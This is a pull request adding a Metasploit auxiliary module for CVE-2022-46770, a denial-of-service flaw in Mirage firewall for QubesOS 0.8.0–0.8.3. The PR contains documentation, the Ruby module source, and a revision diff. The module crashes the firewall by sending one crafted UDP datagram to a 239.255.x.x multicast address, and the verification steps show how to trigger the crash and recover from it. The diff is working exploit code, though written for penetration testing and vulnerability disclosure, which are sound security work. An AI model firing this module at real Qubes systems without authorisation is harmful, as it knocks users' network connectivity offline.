### PR TITLE
New exploit for CVE-2022-46770 Mirage firewall DoS

### DIFF
--- a/documentation/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.md
+++ b/documentation/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.md
@@ -1,0 +1,42 @@
+## Vulnerable Application
+
+The following versions of qubes-mirage-firewall (aka Mirage firewall for
+QubesOS)
+
+- 0.8.0 (588e921b9d78a99f6f49d468a7b68284c50dabeba95698648ea52e99b381723b)
+- 0.8.1 (d0ec19d5b392509955edccf100852bcc9c0e05bf31f1ec25c9cc9c9e74c3b7bf)
+- 0.8.2 (73488b0c54d6c43d662ddf58916b6d472430894f6394c6bdb8a879723abcc06f)
+- 0.8.3 (f499b2379c62917ac32854be63f201e6b90466e645e54dea51e376baccdf26ab)
+
+Vulnerable versions can be downloaded from
+https://github.com/mirage/qubes-mirage-firewall/releases
+Installation instruction is available at
+https://github.com/mirage/qubes-mirage-firewall/blob/609f5295c7b315886244426b685807244c7dbe81/README.md#deploy
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use use auxiliary/dos/mirageos/qubes_mirage_firewall_dos`
+1. Do: `run`
+1. You should crash Mirage firewall
+
+## Options
+
+By default `RHOST` and `RPORT` are randomly chosen, but user can set arbitrary values.
+
+### RHOST
+
+`RHOST` should be in range of 239.255.0.0 to 239.255.255.255.
+
+### RPORT
+
+`RPORT` can be any value from 0 to 65535.
+
+## Scenarios
+
+Demo of the module is use is available at https://youtu.be/x3_vT1BcyOM
+
+### Version and OS
+
+Tested on Qubes release 4.1.1 (R4.1), with Mirage firewall version 0.8.3 build with Solo5 version 0.7.4.

--- a/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb
+++ b/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb
@@ -1,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit',
+      'Description'    => %q{
+          This module allows remote attackers to cause a denial of service (DoS)
+          in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.
+      },
+      'Author'         => 'Krzysztof Burghardt <krzysztof@burghardt.pl>',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2022-46770' ],
+          [ 'URL', 'https://mirage.io/blog/MSA03' ],
+          [ 'URL', 'https://github.com/mirage/qubes-mirage-firewall/issues/166' ],
+        ],
+      'DisclosureDate' => '2022-12-04',
+    ))
+
+    register_options(
+    [
+      Opt::RPORT(5353),
+      Opt::RHOST('239.255.255.250'),
+    ])
+  end
+
+  def run
+    connect_udp
+
+	pkt = 'a'*607
+	print_status("Sending datagram to #{rhost}...")
+	udp_sock.put(pkt)
+
+    disconnect_udp
+  end
+end

--- a/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb
+++ b/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb
@@ -8,36 +8,49 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit',
+        'Description' => %q{
           This module allows remote attackers to cause a denial of service (DoS)
           in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.
-      },
-      'Author'         => 'Krzysztof Burghardt <krzysztof@burghardt.pl>',
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        },
+        'Author' => 'Krzysztof Burghardt <krzysztof@burghardt.pl>',
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2022-46770' ],
           [ 'URL', 'https://mirage.io/blog/MSA03' ],
           [ 'URL', 'https://github.com/mirage/qubes-mirage-firewall/issues/166' ],
         ],
-      'DisclosureDate' => '2022-12-04',
-    ))
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [IOC_IN_LOGS, PHYSICAL_EFFECTS],
+          'SideEffects' => [UNRELIABLE_SESSION]
+        },
+        'DisclosureDate' => '2022-12-04'
+      )
+    )
 
     register_options(
-    [
-      Opt::RPORT(5353),
-      Opt::RHOST('239.255.255.250'),
-    ])
+      [
+        OptAddress.new('RHOST', [ false, 'Target address (Default: random)' ]),
+        OptPort.new('RPORT', [ false, 'Target port (Default: random)' ]),
+      ]
+    )
+
+    deregister_options('RHOSTS')
   end
 
   def run
-    connect_udp
+    rhost = datastore['RHOST'] || [239, 255, Random.new.rand(255), Random.new.rand(255)].join('.')
+    rport = datastore['RPORT'] || Random.new.rand(65535)
+    connect_udp(true, 'RHOST' => rhost, 'RPORT' => rport)
 
-	pkt = 'a'*607
-	print_status("Sending datagram to #{rhost}...")
-	udp_sock.put(pkt)
+    size = Random.new.rand(336...1472)
+    pkt = Random.new.bytes(size)
+    print_status("Sending random datagram of #{size} bytes to #{rhost}:#{rport}...")
+    udp_sock.put(pkt)
 
     disconnect_udp
   end


### PR DESCRIPTION
This add new module for CVE-2022-46770 Mirage firewall DoS.

## Verification

List the steps needed to make sure this thing works

- [ ] Have a Qubes OS operating system
- [ ] Use qubes-mirage-firewall as your firewall VM
- [ ] Start `msfconsole` in qube that use the firewall as its Net qube
- [ ] `use auxiliary/dos/mirageos/qubes_mirage_firewall_dos`
- [ ] `exploit`
- [ ] **Verify** the thing does what it should by `ping <something_behind_firewall>`, Qube should lost network connectivity

Reboot Firewall VM with the following commands to restore network connectivity to allo qubes using the same firewall instance.
```bash
qvm-kill mirage-firewall
qvm-start mirage-firewall
```

Demo: https://youtu.be/x3_vT1BcyOM